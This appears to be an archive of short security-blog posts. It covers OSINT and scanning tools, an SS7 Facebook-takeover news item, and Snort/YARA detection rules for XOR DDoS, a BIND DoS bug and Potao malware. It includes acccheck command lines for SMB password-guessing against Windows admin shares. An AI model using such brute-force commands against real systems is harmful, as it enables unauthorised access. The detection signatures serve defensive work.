27 Haziran 2016 Pazartesi

23 Haziran 2016 Perşembe

Automater

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal. 

Installation:
Automater comes in two  flavors, python script that will work for Linux or Windows, and an exe for Windows.

Windows: The Windows client is currently in development. In the meantime the python code will work on Windows with a python 2.7 install

Linux:
As this is a python script you will need to ensure you have the correct version of python, which for this script is python 2.7. I used mostly standard libraries, but just incase you don't have them, here are the libraries that are required: httplib2, re, sys, argparse, urllib, urllib2

Acccheck

The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution.

The simplest way to run the tool is as follows:

./acccheck.pl -t 10.10.10.1

This mode of execution attempts to connect to the target ADMIN$ share with the username ‘Administrator’ and a [BLANK] for the password.

./acccheck.pl -t 10.10.10.1 -u test -p test

This mode of execution attempts to connect to the target IPC$ share with the username ‘test’ and a password ‘test’.

17 Haziran 2016 Cuma

MASSCAN Web Interface

The setup of the masscan web user interface is pretty standard and straightforward. You will need to create a MySQL database, import the database schema, plop the PHP files under your web root, and edit the config file with the correct details. Here’s what this process would look like.

First, install and setup your web server and some other required packages, checkout a copy of the masscan-web-ui repository, and copy over the MASSCAN web ui files to the web root:

Next, you’ll need to create a MySQL database and user for the web application and then import the masscan database schema.

SS7 attacks used to steal Facebook logins

Hacking Facebook accounts by knowing phone numbers it is possible, a group of researchers from Positive Technologies demonstrated it.

“Researchers have proven just that by taking control of a Facebook account with only a phone number and some hacking skills to exploit the SS7 network, a core piece of telecoms infrastructure shown to be vulnerable repeatedly over the last half decade.” reported a blog post published on Forbes.

The hackers exploit a flaw in the SS7 protocol for hacking Facebook accounts just by knowing a victim’s phone number. The technique allows bypassing any security measure implemented by the giant of the social networks.

SS7 is a set of protocols used in telecommunications ever since the late 1970s, enabling smooth transportation of data without any breaches.

The security issue in the SS7 signalling system could be exploited by criminals, terrorists and intelligence agencies to spy on communications. The SS7 protocol allows cell phone carriers to collect location data related to the user’s device from cell phone towers and share it with other carriers, this means that exploiting the SS7 a carrier is able to discover the position of its customer everywhere he is.

16 Haziran 2016 Perşembe

Analysis of Exploit Database Usage

Managing the Exploit Database is one of those ongoing tasks that ends up taking a significant amount of time and often, we don’t take the time to step back and look at the trends as they occur over time. Have there been more exploits over the years? Perhaps fewer? Is there a shift in platforms being targeted? Has the bar for exploits indeed been raised with the increase in more secure operating system protections?

Exploits by Date & Type


30 Eylül 2015 Çarşamba

XOR DDoS Yara & Snort Rules

XOR DDoS Snort Rule

alert TCP $HOME_NET any -> $EXTERNAL_NET any ( msg: “Xor-DDoS”; \
flow: established; \content: “BB2FA36AAA9541F0BB2FA36AAA9541F0”; \
offset:32; depth: 64; \classtype: trojan-activity; \sid: 201500010; rev: 1;)

XOR DDoS  Yara Rule

rule XOR DDosv1
{
meta:
author = “Akamai SIRT”
description = “Rule to detect XOR DDos infection”
strings:
$st0 = “BB2FA36AAA9541F0”
$st1 = “md5=”
$st2 = “denyip=”
$st3 = “filename=”
$st4 = “rmfile=”
$st5 = “exec_packet”
$st6 = “build_iphdr”
condition:
all of them
}

4 Ağustos 2015 Salı

CVE-2015-5477 IPS Signature



An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.
  
IPS Signature
 

alert udp any any -> any 53 (msg:"ET EXPLOIT Possible BIND9 DoS? CVE-2015-5477 M2"; content:"|01 00 00 01|"; depth:4; offset:2; content:"|00 01|"; distance:4; within:2; pcre:"/^[^\x00]+\x00/R"; content:"|00 f9|"; within:2; fast_pattern; pcre:"/^..[^\x00]+\x00/Rs"; content:!"|00 f9|"; within:2; threshold: type limit, track by_src, seconds 60, count 1; classtype:attempted-dos; sid:2021573; rev:4;)

Solution


Upgrade to the patched release most closely related to your current version of BIND. These can be downloaded from http://www.isc.org/downloads.
  • BIND 9 version 9.9.7-P2
  • BIND 9 version 9.10.2-P3

30 Temmuz 2015 Perşembe

Potao YARA Rules

private rule PotaoDecoy
{
    strings:
        $mz = { 4d 5a }
        $str1 = "eroqw11"
        $str2 = "2sfsdf"
        $str3 = "RtlDecompressBuffer"
        $wiki_str = "spanned more than 100 years and ruined three consecutive" wide

        $old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)}
        $old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00}      
    condition:
        ($mz at 0) and ( (all of ($str*)) or any of ($old_ver*) or $wiki_str )
}